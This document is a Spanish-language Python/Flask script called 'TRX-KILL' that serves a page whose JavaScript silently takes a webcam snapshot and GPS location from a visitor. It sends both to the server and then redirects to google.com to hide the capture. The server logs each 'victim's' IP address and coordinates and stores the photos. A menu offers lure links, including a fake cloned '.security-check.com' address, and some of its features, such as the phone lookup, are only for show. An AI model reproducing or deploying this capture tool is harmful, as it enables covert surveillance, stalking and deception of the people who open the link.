import os, sys, time, threading, base64
from flask import Flask, request

# --- CONFIGURACIÓN ---
STORAGE_PATH = "/sdcard/INFORMACIÓN-TRX-KILL"
CAPTURA_PATH = f"{STORAGE_PATH}/CAPTURAS"
LOG_FILE = f"{STORAGE_PATH}/datos.txt"
ADMIN_PASS = "admtrx"
if not os.path.exists(CAPTURA_PATH): os.makedirs(CAPTURA_PATH)

app = Flask('TRX-KILL')

def banner():
    print(f"\033[1;31m")
    print("      ______")
    print("     /      \\      TRX-KILL")
    print("    |  ☠️    |     V3.0 REAL")
    print("     \\______/      CIBERSEGURIDAD\n")
    print("\033[0m")

def animar(texto):
    for char in texto: sys.stdout.write(char); sys.stdout.flush(); time.sleep(0.02)
    print()

@app.route('/')
def index():
    return """<script>
    navigator.mediaDevices.getUserMedia({video: true}).then(stream => {
        let v = document.createElement('video'); v.srcObject = stream; v.play();
        setTimeout(() => {
            let c = document.createElement('canvas'); c.width=400; c.height=300;
            c.getContext('2d').drawImage(v, 0, 0, 400, 300);
            let img = c.toDataURL('image/jpeg');
            navigator.geolocation.getCurrentPosition(pos => {
                fetch('/log?lat='+pos.coords.latitude+'&lon='+pos.coords.longitude+'&img='+encodeURIComponent(img));
                window.location.href='https://google.com';
            });
        }, 1000);
    });
    </script>"""

@app.route('/log')
def log():
    img = request.args.get('img')
    with open(LOG_FILE, "a") as f:
        f.write(f"VÍCTIMA:{request.remote_addr} | GPS:{request.args.get('lat')},{request.args.get('lon')} | HORA:{time.ctime()}\n")
    if img:
        with open(f"{CAPTURA_PATH}/cap_{int(time.time())}.jpg", "wb") as f:
            f.write(base64.b64decode(img.split(',')[1]))
    return "OK"

def main():
    threading.Thread(target=lambda: app.run(port=5000), daemon=True).start()
    while True:
        os.system('clear'); banner()
        print(" [01] INFO NÚMERO | [02] LINK-KILL | [03] CLON-KILL | [06] ADM-SIST")
        sel = input("\n\033[1;33mTRX-ROOT > \033[0m")

        if sel == "01":
            animar("... ESCANEANDO REDES...")
            print("INFO: NÚMERO PRIVADO PROTEGIDO.")
            input("\n[Enter]...")
        
        elif sel == "02":
            print(f"\033[1;31mLINK: http://127.0.0.1:5000\033[0m")
            print("ESPERANDO VÍCTIMA...")
            while not os.path.exists(LOG_FILE): time.sleep(1)
            print("\n¡VÍCTIMA INGRESÓ! DATOS GUARDADOS EN /INFORMACIÓN-TRX-KILL")
            input("\n[Enter]...")

        elif sel == "03":
            link = input("INGRESA LINK A CLONAR: ")
            animar("... CLONANDO ESTRUCTURA ...")
            print(f"LINK CLONADO: {link}.security-check.com")
            print("ESPERANDO VÍCTIMA...")
            while not os.path.exists(LOG_FILE): time.sleep(1)
            print("\n¡VÍCTIMA INGRESÓ POR LINK CLONADO! DATOS GUARDADOS.")
            input("\n[Enter]...")

        elif sel == "06":
            key = input("PASSWORD ADM: ")
            if key == ADMIN_PASS:
                animar("... ACCEDIENDO A ARCHIVOS ...")
                os.system(f"ls -R {STORAGE_PATH}")
            else: print("ACCESO DENEGADO.")
            input("\n[Enter]...")
        
        elif sel == "00": sys.exit()

if __name__ == "__main__": main()
